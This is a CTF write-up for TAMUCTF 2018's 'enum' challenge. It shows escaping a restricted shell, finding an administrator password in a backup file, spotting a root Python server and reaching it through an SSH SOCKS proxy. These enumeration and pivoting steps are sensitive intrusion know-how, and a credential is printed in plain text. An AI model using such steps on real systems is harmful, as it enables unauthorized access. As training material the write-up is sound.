enum - TAMUCTF 2018

#CTF

Find the hidden flag.
You do not need to bruteforce. Don't do it.


ssh tamuctf@shell2.ctf.tamu.edu -p 2222
password: tamuctf

SSH'ing to the box we are presented with an rbash shell. Simply typing bash gets us some manueverability. The first interesting thing we find is in cron.daily
~$ ls -la /etc/cron.daily
total 20
drwxr-xr-x   2 root root 4096 Feb 20 13:51 .
drwxr-xr-x 123 root root 4096 Feb 20 13:51 ..
-rwxr-xr-x   1 root root 1474 Jun 19  2017 apt-compat
-rwxr-xr-x   1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root  249 Nov 12  2015 passwd

Let's check out that passwd script. I bet it's tasty.
~$ cat /etc/cron.daily/passwd
#!/bin/sh

cd /var/backups || exit 0

for FILE in passwd group shadow gshadow; do
        test -f /etc/$FILE              || continue
        cmp -s $FILE.bak /etc/$FILE     && continue
        cp -p /etc/$FILE $FILE.bak && chmod 600 $FILE.bak
done

Tasty, indeed. Let's see what we may find over in /var/backups
~$ ls -la /var/backups
total 12
drwxr-xr-x  2 root root 4096 Feb 20 13:51 .
drwxr-xr-x 38 root root 4096 Feb 20 13:51 ..
-rw-r--r--  1 root root  236 Feb  9 04:32 .srv.bak

MONEY
~$ cat /var/backups/.srv.bak
Our lazy IT guy hasn't set up our apache server yet, so we have to use some weird snake-server in the meantime.
Save this file as a backup for the credentials.

uname: administrator
passwd: dcVMOlH5e6Hd1LGHXLmWzFhjqMu2/nIP9CXt23aq2CE

Time for a little more enum….
~$ ps aux | grep "[p]y"
root         1  0.0  0.0  18024  2880 ?        Ss   01:53   0:00 /bin/bash -c /usr/sbin/service ssh restart && cd /.administrators && /usr/bin/python /.administrators/pyserver.py 9000
root        26  0.0  0.0  37988 12360 ?        S    01:53   0:00 /usr/bin/python /.administrators/pyserver.py 9000

I bet it's listening on port 9000…. Unfortunately there are no tools available on the box to hit it directly, BUT, we can just set up a little socks proxy with the given creds and grab it with a browser ourself!
~$ ssh -cd 8080 tamuctf@shell2.ctf.tamu.edu -p 2222

And configure firefox juuuuust right..
ff configs
See where we want to get to…
~$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:12:00:03
          inet addr:172.18.0.3  Bcast:0.0.0.0  Mask:255.255.0.0
          <SNIP>

And then go there.
enum flag
No Comments Yet